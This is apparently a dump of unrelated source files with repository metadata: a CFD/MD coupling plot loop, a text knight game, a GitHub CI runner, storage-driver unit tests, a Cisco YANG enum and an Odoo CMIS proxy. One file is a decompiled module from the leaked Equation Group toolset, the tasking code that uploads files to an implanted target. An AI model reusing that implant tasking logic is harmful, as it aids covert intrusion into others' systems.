axslider = plt.axes([0.25, 0.1, 0.65, 0.03])
freq = 1.
sfreq = Slider(axslider, 'Freq', 0.1, 2.0, valinit=freq)
def update(val):
freq = sfreq.val
global freq
print("CHANGED", freq)
sfreq.on_changed(update)
plt.ion()
plt.show()
# === Plot both grids ===
dx = CPL.get("xl_cfd")/float(CPL.get("ncx"))
dy = CPL.get("yl_cfd")/float(CPL.get("ncy"))
dz = CPL.get("zl_cfd")/float(CPL.get("ncz"))
ioverlap = (CPL.get("icmax_olap")-CPL.get("icmin_olap")+1)
joverlap = (CPL.get("jcmax_olap")-CPL.get("jcmin_olap")+1)
koverlap = (CPL.get("kcmax_olap")-CPL.get("kcmin_olap")+1)
xoverlap = ioverlap*dx
yoverlap = joverlap*dy
zoverlap = koverlap*dz
for time in range(100000):
# recv data to plot
olap_limits = CPL.get_olap_limits()
portion = CPL.my_proc_portion(olap_limits)
[ncxl, ncyl, nczl] = CPL.get_no_cells(portion)
recv_array = np.zeros((1, ncxl, ncyl, nczl), order='F', dtype=np.float64)
recv_array, ierr = CPL.recv(recv_array, olap_limits)
#Plot CFD and coupler Grid
draw_grid(ax,
nx=CPL.get("ncx"),
ny=CPL.get("ncy"),
nz=CPL.get("ncz"),
px=CPL.get("npx_cfd"),
py=CPL.get("npy_cfd"),
pz=CPL.get("npz_cfd"),
xmin=CPL.get("x_orig_cfd"),
ymin=CPL.get("y_orig_cfd"),
zmin=CPL.get("z_orig_cfd"),
xmax=(CPL.get("icmax_olap")+1)*dx,
ymax=CPL.get("yl_cfd"),
zmax=(CPL.get("kcmax_olap")+1)*dz,
lc = 'r',
label='CFD')
#Plot MD domain
draw_grid(ax, nx=1, ny=1, nz=1,
px=CPL.get("npx_md"),
py=CPL.get("npy_md"),
pz=CPL.get("npz_md"),
xmin=CPL.get("x_orig_md"),
ymin=-CPL.get("yl_md")+yoverlap,
zmin=CPL.get("z_orig_md"),
xmax=(CPL.get("icmax_olap")+1)*dx,
ymax=yoverlap,
zmax=(CPL.get("kcmax_olap")+1)*dz,
label='MD')
#Plot x component on grid
x = np.linspace(CPL.get("x_orig_cfd")+.5*dx,xoverlap-.5*dx,ioverlap)
z = np.linspace(CPL.get("z_orig_cfd")+.5*dz,zoverlap-.5*dz,koverlap)
for j in range(joverlap):
ax.plot(x, 0.5*dy*(recv_array[0,:,j,0]+1.+2*j), 's-')
ax.set_xlabel('$x$')
ax.set_ylabel('$y$')
print(time, freq)
plt.pause(0.1)
ax.cla()
# send data to update
olap_limits = CPL.get_olap_limits()
portion = CPL.my_proc_portion(olap_limits)
[ncxl, ncyl, nczl] = CPL.get_no_cells(portion)
send_array = freq*np.ones((1, ncxl, ncyl, nczl), order='F', dtype=np.float64)
CPL.send(send_array, olap_limits)
CPL.finalize()
MPI.Finalize()
| gpl-3.0 | 4,246,740,477,422,610,000 | 30.033333 | 81 | 0.583512 | false |
DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Tasking/Mcl_Cmd_Put_Tasking.py | 1 | 6883 | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: Mcl_Cmd_Put_Tasking.py
UPLOADS_DIR = 'Uploads'
MAX_CHUNK_SIZE = 1047552
def TaskingMain(namespace):
import mcl.imports
import mcl.target
import mcl.tasking
import mcl.tasking.env
import mcl.tasking.resource
import mcl.tasking.technique
import mcl.tasking.virtualdir
from mcl.object.Message import MarshalMessage
mcl.imports.ImportWithNamespace(namespace, 'mca.file.cmd.put', globals())
mcl.imports.ImportWithNamespace(namespace, 'mca.file.cmd.put.tasking', globals())
lpParams = mcl.tasking.GetParameters()
if lpParams['chunksize'] == 0 or lpParams['chunksize'] >= MAX_CHUNK_SIZE:
mcl.tasking.OutputError('Invalid chunkSize given')
return False
else:
provider = mcl.tasking.technique.Lookup('PUT', mcl.tasking.technique.TECHNIQUE_MCL_NTNATIVEAPI, lpParams['method'])
if lpParams['source'] == None or len(lpParams['source']) == 0:
mcl.tasking.OutputError('No local file given')
return False
local = lpParams['source']
if lpParams['remote'] == None or len(lpParams['remote']) == 0:
if local.find('\\') != -1 or local.find('/') != -1:
mcl.tasking.OutputError('You must specify a remote file name if you specify a path for the local file')
return False
remote = local
else:
remote = lpParams['remote']
resFlags = 0
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_ARCH
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_OS
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_LIBC
if lpParams['compiled']:
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_COMPILED
f, openedName, usedProject = mcl.tasking.resource.Open(local, resFlags, UPLOADS_DIR, lpParams['project'])
if f == None:
mcl.tasking.OutputError("Failed to open local file '%s'" % local)
return False
try:
import os.path
import array
fileSize = os.path.getsize(openedName)
if fileSize == 0 or fileSize > 4294967295:
mcl.tasking.OutputError("Invalid file size (%u) for put of '%s'" % (fileSize, openedName))
return False
taskXml = mcl.tasking.Tasking()
taskXml.AddProvider(mcl.tasking.technique.TECHNIQUE_MCL_NTNATIVEAPI, provider)
mcl.tasking.OutputXml(taskXml.GetXmlObject())
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('PutFile')
xml.AddAttribute('name', openedName)
xml.AddAttribute('size', '%u' % fileSize)
mcl.tasking.OutputXml(xml)
fileBytes = array.array('B', f.read())
if len(fileBytes) != fileSize:
mcl.tasking.OutputError('Failed to read file (read=%u | expected=%u)' % (len(fileBytes), fileSize))
return False
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_PUT_COMPLETE, 'false')
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_BYTES_LEFT, '%u' % fileSize)
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_FILE_SIZE, '%u' % fileSize)
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_FILE_OPENED, 'false')
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED, 'false')
finally:
f.close()
f = None
createParams = mca.file.cmd.put.CreateParams()
createParams.writeOffset = 0
createParams.provider = provider
if lpParams['permanent']:
createParams.flags |= mca.file.cmd.put.PARAMS_CREATE_FLAG_PERMANENT
try:
createParams.filePath = mcl.tasking.virtualdir.GetFullPath(remote)
except:
mcl.tasking.OutputError('Failed to apply virtual directory to remote name')
return False
rpc = mca.file.cmd.put.tasking.RPC_INFO_CREATE
msg = MarshalMessage()
createParams.Marshal(msg)
rpc.SetData(msg.Serialize())
rpc.SetMessagingType('message')
res = mcl.tasking.RpcPerformCall(rpc)
if res != mcl.target.CALL_SUCCEEDED:
mcl.tasking.RecordModuleError(res, 0, mca.file.cmd.put.errorStrings)
return False
import time
while not mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_FILE_OPENED):
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
chunkIndex = 0
bytesLeft = fileSize
while bytesLeft > 0:
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
numBytesToSend = bytesLeft
if numBytesToSend > lpParams['chunksize']:
numBytesToSend = lpParams['chunksize']
startIndex = fileSize - bytesLeft
endIndex = startIndex + numBytesToSend
writeParams = mca.file.cmd.put.WriteParams()
writeParams.data = fileBytes[startIndex:endIndex]
writeParams.chunkIndex = chunkIndex
if numBytesToSend >= bytesLeft:
writeParams.lastData = True
chunkIndex = chunkIndex + 1
rpc = mca.file.cmd.put.tasking.RPC_INFO_WRITE
msg = MarshalMessage()
writeParams.Marshal(msg)
rpc.SetData(msg.Serialize())
rpc.SetMessagingType('message')
res = mcl.tasking.RpcPerformCall(rpc)
if res != mcl.target.CALL_SUCCEEDED:
mcl.tasking.RecordModuleError(res, 0, mca.file.cmd.put.errorStrings)
return False
newBytesLeft = bytesLeft
while newBytesLeft == bytesLeft:
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
newBytesLeft = int(mcl.tasking.env.GetValue(mca.file.cmd.put.LP_ENV_BYTES_LEFT))
bytesLeft = newBytesLeft
while not mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_PUT_COMPLETE):
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
if not lpParams['permanent']:
mcl.tasking.TaskGoToBackground()
while not mcl.CheckForStop():
time.sleep(1)
return mcl.tasking.TaskSetStatus(mcl.target.CALL_SUCCEEDED)
if __name__ == '__main__':
import sys
if TaskingMain(sys.argv[1]) != True:
sys.exit(-1) | unlicense | -8,070,547,693,328,371,000 | 44.289474 | 123 | 0.611361 | false |
helewonder/knightgame | wargame/game.py | 1 | 3956 | from hut import Hut, create_unit
from functions import print_bold, print_dotted_line, show_health, \
print_wave_line
from knight import Knight
from uniterror import HutNotNumberError, HutOutRangeError
class OrGame():
"""
The Game Class , mainly
"""
def __init__(self, hut_numbers=5):
"""get the game ready with scenario ready, default have 5huts.
:param hut_numbers: in the game, how many huts
:type hut_numbers: int
"""
self.acquired_all_huts = False
self.huts = []
self.player = None
self.hut_numbers = hut_numbers
@property
def get_occupants(self):
"""Show all huts with it's occupant
:return: the message each hut with occupant
:rtype: basestring
"""
msg = "["
for hut in self.huts:
msg += str(hut.number) + ":" + hut.get_occupant_type + ", "
msg += '\b\b]'
return msg
def _process_user_choice(self):
verifying_choice = True
idx = 0
print_dotted_line()
print("Current Occupants:\n\t%s" % self.get_occupants)
print_dotted_line()
while verifying_choice:
user_choice = input(
"Choose a hut number to enter(1~" + str(
self.hut_numbers) + "):")
try:
if not user_choice.isdigit():
raise HutNotNumberError(
"Your input '{}' is not number.".format(user_choice))
idx = int(user_choice)
if idx > self.hut_numbers or idx < 0:
raise HutOutRangeError(
"input not in range(1~" + str(self.hut_numbers) + ")")
except HutNotNumberError as e:
print_wave_line()
print(e)
print(e.error_message)
print_wave_line()
continue
except HutOutRangeError as e:
print_wave_line()
print(e)
print(e.error_message)
print_wave_line()
continue
if self.huts[idx - 1].is_acquired:
print(
"You have already acquired this hut. Try again",
"<Info:You can NOT get healed in already acquired hut.>"
)
else:
verifying_choice = False
return idx
def play(self):
"""
Workhorse method to play the game....
Create a Knight instance, create huts and preoccupy them with a game
Character instance (or leave empty)
"""
self.setup_game_scenario()
while not self.acquired_all_huts:
idx = self._process_user_choice()
self.player.acquire_hut(self.huts[idx - 1])
if self.player.health_meter <= 0:
print("You Lose :( Better luck next time")
break
for hut in self.huts:
if not hut.is_acquired:
break
else:
self.acquired_all_huts = True
if self.acquired_all_huts:
print_bold("You Win!!! Congratulations!!!!!!")
def setup_game_scenario(self):
"""
Create player and huts and then randomly pre-occupy huts...
"""
self.player = Knight("Sir Foo")
for number in range(self.hut_numbers):
self.huts.append(Hut(number + 1, create_unit()))
self._show_mission()
# print_bold("Current Occupants:", self.get_occupants)
show_health(self.player, bold=True, end='\n')
@staticmethod
def _show_mission():
print_dotted_line()
print_bold("Welcome to Play the Knight Game!", end='\n')
print_dotted_line()
print_bold("Mission:")
print("\t1. Defeat the enemy in any hut")
print("\t2. Bring all huts in the village under your contral")
| mit | -2,352,176,094,657,368,000 | 30.903226 | 78 | 0.523509 | false |
Mach33Labs/labautomation | github.py | 1 | 5717 | #!/usr/bin/python
import datetime
import fcntl
import github3
import gzip
import json
import os
import re
import select
import socket
import subprocess
import sys
import time
import mysql.connector
TARGET_VM = 'devosa'
TARGET_IP_BLOCK = '192.168.53.0/24'
with open(os.path.expanduser('~/.github_automation'), 'r') as f:
config = json.loads(f.read())
ISSUE_URL_RE = re.compile('https://api.github.com/repos/(.*)/(.*)/issues/(.*)')
def github_comment(issue_url, comment):
if not issue_url:
return
g = github3.login(config['github_user'], config['github_password'])
m = ISSUE_URL_RE.match(issue_url)
if not m:
print 'Could not parse issue URL!'
return
issue = g.issue(m.group(1), m.group(2), int(m.group(3)))
issue.create_comment(comment)
def process(job):
ostrich_sha = job['sha']
if job['project'] != 'ostrich':
ostrich_sha = 'master'
state = {}
with open('state.json.%s' % job['flavour'], 'r') as f:
state = json.loads(f.read())
state['complete']['osa-branch'] = job['branch']
state['complete']['ironic-ip-block'] = TARGET_IP_BLOCK
with open('state.json', 'w') as f:
f.write(json.dumps(state, indent=4, sort_keys=True))
short_branch = job['branch'].replace('stable/', '')
now = datetime.datetime.now()
job_id = ('%04d%02d%02d-%02d%02d-%s-%s-%s'
%(now.year, now.month, now.day, now.hour, now.minute,
job['project'], short_branch, job['sha']))
job['short_branch'] = short_branch
job['job_id'] = job_id
job['timestamp'] = job['timestamp'].isoformat()
with open('job.json', 'w') as f:
f.write(json.dumps(job, indent=4, sort_keys=True))
with gzip.open('%s.log.gz' % job_id, 'w') as f:
rc = execute('sudo ./reset_osa.sh %s %s %s %s %s'
%(TARGET_VM, job['distro'], ostrich_sha, job_id,
job['project']), f)
return (rc, job_id)
def execute(command, logfile):
print('Running %s' % command)
obj = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
flags = fcntl.fcntl(obj.stdout, fcntl.F_GETFL)
fcntl.fcntl(obj.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK)
flags = fcntl.fcntl(obj.stderr, fcntl.F_GETFL)
fcntl.fcntl(obj.stderr, fcntl.F_SETFL, flags | os.O_NONBLOCK)
obj.stdin.close()
while obj.poll() is None:
readable, _, _ = select.select([obj.stderr, obj.stdout], [], [], 10)
for f in readable:
d = os.read(f.fileno(), 10000)
sys.stdout.write(d)
logfile.write(d)
logfile.flush()
print('... process complete')
returncode = obj.returncode
print('... exit code %d' % returncode)
return returncode
def main():
while True:
conn = mysql.connector.connect(**config['db'])
cursor = conn.cursor(dictionary=True, buffered=True)
cursor.execute('select * from jobs where processed=0 and '
'machine is null order by timestamp;')
if cursor.rowcount == 0:
print '%s No work, sleeping' % datetime.datetime.now()
time.sleep(60)
continue
job = cursor.fetchone()
cursor.execute('update jobs set machine=%(machine)s where '
'uuid=%(uuid)s and machine is null;',
{
'machine': socket.gethostname(),
'uuid': job['uuid']
})
if cursor.rowcount == 0:
print 'My job got stolen (id %s)!' % job['uuid']
continue
cursor.execute('commit;')
start_time = time.time()
rc, job_id = process(job)
end_time = time.time()
conn = mysql.connector.connect(**config['db'])
cursor = conn.cursor(dictionary=True, buffered=True)
cursor.execute('update jobs set processed=1, outcome=%(outcome)s, '
'log_url=%(log_url)s '
'where uuid=%(uuid)s;',
{
'outcome': rc,
'log_url': ('http://molokai.stillhq.com/lab/logs/%s/'
% job_id),
'uuid': job['uuid']
})
cursor.execute('commit;')
cursor.execute('select * from jobs where event_uuid=%(event_uuid)s;',
{'event_uuid': job['event_uuid']})
report = []
unrun = 0
for job in cursor:
outcome = ''
if str(job['outcome']) == '0':
outcome = 'passed'
elif job['outcome']:
outcome = 'failed'
else:
unrun += 1
outcome = 'not yet run'
logs = ''
if job['log_url']:
logs = ', logs at %s' % job['log_url']
report.append('%s on %s %s%s' %(job['branch'], job['distro'],
outcome, logs))
comment = 'Tests run on %s:' % job['sha']
for r in report:
comment += ('\n %s' % r)
print 'Unrun: %d' % unrun
print comment
if unrun == 0:
github_comment(job['issue_url'], comment)
#if rc != 0:
# print 'Failed test run, stopping to debug'
# sys.exit(1)
if job['type'] == 'manual':
print 'Manual job, stopping for user to operate'
sys.exit(1)
if __name__ == '__main__':
main()
| apache-2.0 | 634,645,749,023,385,500 | 29.902703 | 80 | 0.509183 | false |
xapi-project/sm | tests/test_HBASR.py | 1 | 8516 | import mock
import HBASR
import unittest
import xmlrpclib
import xs_errors
import os
import SR
import xml.dom.minidom
import util
def mock_init(self):
pass
def imp_fake_probe():
dom = xml.dom.minidom.Document()
hbalist = dom.createElement("HBAInfoList")
dom.appendChild(hbalist)
for host in ["host1", "host2"]:
hbainfo = dom.createElement("HBAInfo")
hbalist.appendChild(hbainfo)
sname = "nvme_special"
entry = dom.createElement("model")
hbainfo.appendChild(entry)
textnode = dom.createTextNode(sname)
entry.appendChild(textnode)
nname = "0x200000e08b18208b"
nname = util.make_WWN(nname)
entry = dom.createElement("nodeWWN")
hbainfo.appendChild(entry)
textnode = dom.createTextNode(nname)
entry.appendChild(textnode)
port = dom.createElement("Port")
hbainfo.appendChild(port)
pname = "0x500143802426baf4"
pname = util.make_WWN(pname)
entry = dom.createElement("portWWN")
port.appendChild(entry)
textnode = dom.createTextNode(pname)
entry.appendChild(textnode)
state = "toast"
entry = dom.createElement("state")
port.appendChild(entry)
textnode = dom.createTextNode(state)
entry.appendChild(textnode)
entry = dom.createElement("deviceName")
port.appendChild(entry)
textnode = dom.createTextNode("/sys/class/scsi_host/%s" % host)
entry.appendChild(textnode)
return dom.toxml()
def fake_probe(self):
return imp_fake_probe()
class TestHBASR(unittest.TestCase):
@mock.patch('HBASR.HBASR.__init__', mock_init)
def test_handles(self):
sr = HBASR.HBASR()
self.assertFalse(sr.handles("blah"))
self.assertTrue(sr.handles("hba"))
@mock.patch('HBASR.HBASR.__init__', mock_init)
def test_load(self):
sr_uuid = 123
sr = HBASR.HBASR()
sr.dconf = {}
sr.load(sr_uuid)
self.assertEqual(sr.sr_vditype, 'phy')
self.assertEqual(sr.type, 'any')
self.assertFalse(sr.attached)
self.assertEqual(sr.procname, "")
self.assertEqual(sr.devs, {})
sr.dconf = {"type": None}
sr.load(sr_uuid)
self.assertEqual(sr.sr_vditype, 'phy')
self.assertEqual(sr.type, 'any')
self.assertFalse(sr.attached)
self.assertEqual(sr.procname, "")
self.assertEqual(sr.devs, {})
sr.dconf = {"type": "blah"}
sr.load(sr_uuid)
self.assertEqual(sr.sr_vditype, 'phy')
self.assertEqual(sr.type, 'blah')
self.assertFalse(sr.attached)
self.assertEqual(sr.procname, "")
self.assertEqual(sr.devs, {})
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('HBASR.devscan.adapters', autospec=True)
@mock.patch('HBASR.scsiutil.cacheSCSIidentifiers', autospec=True)
def test__intit_bhadict_already_init(self, mock_cacheSCSIidentifiers,
mock_devscan_adapters):
sr = HBASR.HBASR()
sr.hbas = {"Pitt": "The elder"}
sr._init_hbadict()
self.assertEqual(mock_cacheSCSIidentifiers.call_count, 0)
self.assertEqual(mock_devscan_adapters.call_count, 0)
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('HBASR.devscan.adapters', autospec=True)
@mock.patch('HBASR.scsiutil.cacheSCSIidentifiers', autospec=True)
def test__init_hbadict(self, mock_cacheSCSIidentifiers,
mock_devscan_adapters):
sr = HBASR.HBASR()
sr.type = "foo"
mock_devscan_adapters.return_value = {"devs": "toaster", "adt": []}
sr._init_hbadict()
mock_devscan_adapters.assert_called_with(filterstr="foo")
self.assertEqual(mock_cacheSCSIidentifiers.call_count, 0)
self.assertEqual(mock_devscan_adapters.call_count, 1)
self.assertEqual(sr.hbas, [])
self.assertEqual(sr.hbadict, "toaster")
mock_cacheSCSIidentifiers.call_count = 0
mock_devscan_adapters.call_count = 0
mock_cacheSCSIidentifiers.return_value = "123445"
sr2 = HBASR.HBASR()
sr2.type = "foo"
mock_devscan_adapters.return_value = {"devs": "toaster",
"adt": ["dev1", "dev2"]}
sr2._init_hbadict()
self.assertEqual(mock_cacheSCSIidentifiers.call_count, 1)
self.assertEqual(mock_devscan_adapters.call_count, 1)
self.assertEqual(sr2.hbas, ["dev1", "dev2"])
self.assertEqual(sr2.hbadict, "toaster")
self.assertTrue(sr2.attached)
self.assertEqual(sr2.devs, "123445")
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('LVHDoHBASR.xs_errors.XML_DEFS',
"drivers/XE_SR_ERRORCODES.xml")
@mock.patch('HBASR.HBASR._probe_hba', autospec=True)
@mock.patch('HBASR.xml.dom.minidom.parseString', autospec=True)
def test__init_hbahostname_assert(self, mock_parseString, mock_probe_hba):
sr = HBASR.HBASR()
mock_probe_hba.return_value = "blah"
mock_parseString.side_effect = Exception("bad xml")
with self.assertRaises(SR.SROSError) as cm:
sr._init_hba_hostname()
self.assertEqual(str(cm.exception),
"Unable to parse XML "
"[opterr=HBA Host WWN scanning failed]")
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('HBASR.HBASR._probe_hba', fake_probe)
def test__init_hbahostname(self):
sr = HBASR.HBASR()
res = sr._init_hba_hostname()
self.assertEqual(res, "20-00-00-e0-8b-18-20-8b")
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('LVHDoHBASR.xs_errors.XML_DEFS',
"drivers/XE_SR_ERRORCODES.xml")
@mock.patch('HBASR.HBASR._probe_hba', autospec=True)
@mock.patch('HBASR.xml.dom.minidom.parseString', autospec=True)
def test__init_hbas_assert(self, mock_parseString, mock_probe_hba):
sr = HBASR.HBASR()
mock_probe_hba.return_value = "blah"
mock_parseString.side_effect = Exception("bad xml")
with self.assertRaises(SR.SROSError) as cm:
sr._init_hbas()
self.assertEqual(str(cm.exception),
"Unable to parse XML "
"[opterr=HBA scanning failed]")
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('HBASR.HBASR._probe_hba', fake_probe)
def test__init_hbas(self):
sr = HBASR.HBASR()
res = sr._init_hbas()
self.assertEqual(res, {'host2': '50-01-43-80-24-26-ba-f4',
'host1': '50-01-43-80-24-26-ba-f4'})
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('LVHDoHBASR.xs_errors.XML_DEFS',
"drivers/XE_SR_ERRORCODES.xml")
@mock.patch('HBASR.util.pread', autospec=True)
def test__probe_hba_assert(self, mock_pread):
sr = HBASR.HBASR()
mock_pread.side_effect = Exception("bad")
with self.assertRaises(SR.SROSError) as cm:
sr._probe_hba()
self.assertEqual(str(cm.exception),
"Unable to parse XML "
"[opterr=HBA probe failed]")
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('LVHDoHBASR.xs_errors.XML_DEFS',
"drivers/XE_SR_ERRORCODES.xml")
@mock.patch('HBASR.util.pread', autospec=True)
@mock.patch('HBASR.util.listdir', autospec=True)
def test__probe_hba(self, mock_listdir, mock_pread):
sr = HBASR.HBASR()
mock_listdir.return_value = iter(["host1", "host2"])
# Output of preads sliced by _probe_hba to remove newlines.
mock_pread.side_effect = iter(["nvme_special\n",
"0x200000e08b18208b\n",
"0x500143802426baf4\n",
"toast\n",
"nvme_special\n",
"0x200000e08b18208b\n",
"0x500143802426baf4\n",
"toast\n"])
res = sr._probe_hba()
self.assertEqual(res, imp_fake_probe())
@mock.patch('HBASR.HBASR.__init__', mock_init)
@mock.patch('HBASR.HBASR._mpathHandle', autospec=True)
def test_attach(self, mock_mpath):
sr = HBASR.HBASR()
sr.attach(1234)
self.assertEqual(mock_mpath.call_count, 1)
| lgpl-2.1 | -5,508,638,655,393,202,000 | 35.706897 | 78 | 0.590535 | false |
abhikeshav/ydk-py | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_aaa_locald_cfg.py | 1 | 1133 | """ Cisco_IOS_XR_aaa_locald_cfg
This module contains a collection of YANG definitions
for Cisco IOS\-XR aaa\-locald package configuration.
This YANG module augments the
Cisco\-IOS\-XR\-aaa\-lib\-cfg
module with configuration data.
Copyright (c) 2013\-2015 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class AaaLocaldTaskClassEnum(Enum):
"""
AaaLocaldTaskClassEnum
Aaa locald task class
.. data:: READ = 0
Permits read operation for a Task ID
.. data:: WRITE = 1
Permits write operation for a Task ID
.. data:: EXECUTE = 2
Permits execute operation for a Task ID
.. data:: DEBUG = 3
Permits debug operation for a Task ID
"""
READ = 0
WRITE = 1
EXECUTE = 2
DEBUG = 3
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_locald_cfg as meta
return meta._meta_table['AaaLocaldTaskClassEnum']
| apache-2.0 | -94,935,661,741,093,040 | 16.166667 | 86 | 0.677846 | false |
acsone/alfodoo | cmis_web_proxy/controllers/cmis.py | 1 | 18684 | # Copyright 2016 ACSONE SA/NV (<http://acsone.eu>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
import json
import logging
import urlparse
import werkzeug
from odoo import _, http
from odoo.http import request
from odoo.exceptions import AccessError
from odoo.addons.web.controllers import main
_logger = logging.getLogger(__name__)
try:
import requests
except ImportError:
_logger.debug('Cannot `import requests`.')
CMIS_PROXY_PATH = '/cmis/1.1/browser'
READ_ACCESS_CMIS_ACTIONS = set([
"query",
])
WRITE_ACCESS_CMIS_ACTIONS = set([
"createRelationship",
# "createPolicy", method at repository level: not supported
# "createItem", method at repository level: not supported
"bulkUpdate",
# "createType", method at repository level: not supported
# "updateType", method at repository level: not supported
"createDocument",
"createFolder",
"createDocumentFromSource",
# "createPolicy", method at repository level: not supported
"update",
"setContent",
"checkOut",
"cancelCheckOut",
"checkIn",
# "applyPolicy", method at repository level: not supported
# "applyACL", method at repository level: not supported
])
UNLINK_ACCESS_CMIS_ACTIONS = set([
"delete",
"deleteContent",
"removeObjectFromFolder",
# "removePolicy", method at repository level: not supported
# "deleteType", method at repository level: not supported
])
READ_ACCESS_ALLOWABLE_ACTIONS = set([
"canGetDescendants",
"canGetChildren",
"canGetFolderParent",
"canGetObjectParents",
"canGetProperties",
"canGetContentStream",
"canGetAllVersions",
"canGetObjectRelationships",
"canGetAppliedPolicies",
"canGetACL",
])
WRITE_ACCESS_ALLOWABLE_ACTIONS = set([
"canCreateDocument",
"canCreateFolder",
# "canCreatePolicy",
"canCreateRelationship",
"canUpdateProperties",
"canMoveObject",
"canSetContentStream",
"canAddObjectToFolder",
"canCheckOut",
"canCancelCheckOut",
"canCheckIn",
# "canApplyPolicy",
# "canApplyACL",
])
UNLINK_ACCESS_ALLOWABLE_ACTIONS = set([
"canRemoveObjectFromFolder",
"canDeleteObject",
"canDeleteContentStream",
"canDeleteTree",
# "canRemovePolicy",
])
CMSI_ACTIONS_OPERATION_MAP = {}
for a in READ_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'read'
for a in WRITE_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'write'
for a in UNLINK_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'unlink'
def gen_dict_extract(key, var):
""" This method is used to recusrively find into a json structure (dict)
all values of a given key
credits: http://stackoverflow.com/questions/9807634/
find-all-occurences-of-a-key-in-nested-python-dictionaries-and-lists
"""
if hasattr(var, 'items'):
for k, v in var.items():
if k == key:
yield v
if isinstance(v, dict):
for result in gen_dict_extract(key, v):
yield result
elif isinstance(v, list):
for d in v:
for result in gen_dict_extract(key, d):
yield result
class CmisProxy(http.Controller):
@property
def _cmis_proxy_base_url(self):
return urlparse.urljoin(request.httprequest.host_url, CMIS_PROXY_PATH)
@classmethod
def _clean_url_in_dict(cls, values, original, new):
"""Replace all occurences of the CMIS container url in the json
returned by a call to the CMIS container by the one of the proxy"""
if original.endswith('/'):
original = original[:-1]
for k, v in values.items():
if isinstance(v, dict):
cls._clean_url_in_dict(v, original, new)
elif hasattr(v, 'replace'):
values[k] = v.replace(original, new)
def _check_access_operation(self, model_inst, operation):
"""
Check if the user has the appropriate rights to perform the operation.
The default is to check the access rights and access rules on the
model instance. This behaviour can be adapted by defining the method
''_check_cmis_access_operation'' on the model.
::
@api.multi
def _check_cmis_access_operation(self, operation, field_name=None):
if my_true_condition:
return 'allow'
if my_false_condition:
return 'deny'
return 'default'
The expected result must be in ('allow', 'deny', 'default').
* allow: Access granted
* deny: Access Denied
* default: The current method will check the access rights and access
rules
"""
try:
if hasattr(model_inst, '_check_cmis_access_operation'):
res = model_inst._check_cmis_access_operation(operation, None)
if res not in ('allow', 'deny', 'default'):
raise ValueError("_check_cmis_access_operation result "
"must be in ('allow', 'deny', 'default')")
if res != 'default':
return res == 'allow'
model_inst.check_access_rights(operation)
model_inst.check_access_rule(operation)
except AccessError:
return False
return True
def _apply_permissions_mapping(self, value, headers, proxy_info,
model_inst=None):
"""This method modify the defined allowableActions returned by the
CMIS container to apply the Odoo operation policy defined of the
model instance
"""
if not model_inst:
return
all_allowable_actions = [aa for aa in gen_dict_extract(
'allowableActions', value)]
if not all_allowable_actions:
return
can_read = self._check_access_operation(model_inst, 'read')
can_write = self._check_access_operation(model_inst, 'write')
can_unlink = self._check_access_operation(model_inst, 'unlink')
for allowable_actions in all_allowable_actions:
for action, val in allowable_actions.items():
allowed = False
if action in READ_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_read and val
elif action in WRITE_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_write and val
elif action in UNLINK_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_unlink and val
allowable_actions[action] = allowed
def _sanitize_headers(self, headers):
for key in headers:
if key.lower() == 'transfer-encoding':
headers[key] = None
def _prepare_json_response(self, value, headers, proxy_info,
model_inst=None):
cmis_location = proxy_info['location']
self._clean_url_in_dict(value,
urlparse.urlparse(cmis_location).geturl(),
proxy_info['proxy_location'])
if proxy_info['apply_odoo_security']:
self._apply_permissions_mapping(
value, headers, proxy_info, model_inst)
self._sanitize_headers(headers)
